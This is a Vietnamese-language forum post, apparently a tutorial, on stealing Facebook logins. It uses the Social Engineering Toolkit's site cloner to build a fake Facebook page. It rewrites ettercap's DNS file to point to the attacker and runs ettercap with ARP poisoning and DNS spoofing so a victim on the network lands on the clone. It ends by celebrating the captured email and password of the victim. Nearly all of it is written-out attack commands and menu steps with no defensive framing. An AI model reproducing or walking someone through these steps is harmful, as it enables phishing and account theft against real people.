Thực Hiện Tấn Công Facebook Bằng Công Cụ Social Engineering Toolkit.

Thực hiện giả mạo Website sử dụng công cụ Social Engineering Toolkit ta gõ 2 lệnh sau:
# cd /pentest/exploits/set/
# ./set
Sau đó tiếp tục gõ yes và cho ra kết quả như hình bên dưới:

Ta chọn 1 (Social-Engineering Attacks) rồi tiếp tục chọn 2 (Website Attack Vectors)

Tiếp tục chọn 3 (Credential Harverster Attack Method)

Sau đó chọn 2 (Site Cloner)

Tiếp tục ta nhập IP máy Attacker vào rồi sau đó nhập địa chỉ web facebook là www(.)facebook(.) - bỏ "()" com vào (đây chính là website Attacker sẽ giả mạo). Kết quả giống hình bên dưới:

Giờ ta sẽ thực hiện điều hướng và giả mạo DNS. Ta gõ dòng lệnh sau:
# locate etter.dns
Ta gõ tiếp dòng lệnh sau để vào cấu hình giả mạo DNS đánh lừa người dùng:
# vi /usr/local/share/etter.dns
Ta thay thế toàn bộ địa chỉ cũ thành địa chỉ của attacker rồi lưu lại. Ta được kết quả như hình dưới đây:

Bắt đầu quá trình giả mạo DNS bằng lệnh sau:
# ettercap –Tqi eth0 –P dns_spoof –M arp // //
Và đưa ra kết quả như hình bên dưới:

Chuyển sang máy victim và thực hiện đăng nhập vào facebook

Giờ ta quay lại máy attacker và đã thu được thành quả. Ta đã có được user và password facebook của nạn nhân.
Ở hình bên dưới ta có được email đăng nhập và password của nạn nhân, vậy là đã thành công.

Xem video hướng dẫn —>goo gl/SXmrZQ (Copy và thay khoảng trắng bằng dấu chấm"." )

Không thể thực hiện tác vụ do chủ đề hiện đang ở trạng thái lưu trữ

Thực Hiện Tấn Công Facebook Bằng Công Cụ Social Engineering Toolkit.

Chủ đề cùng mục

Mới nhất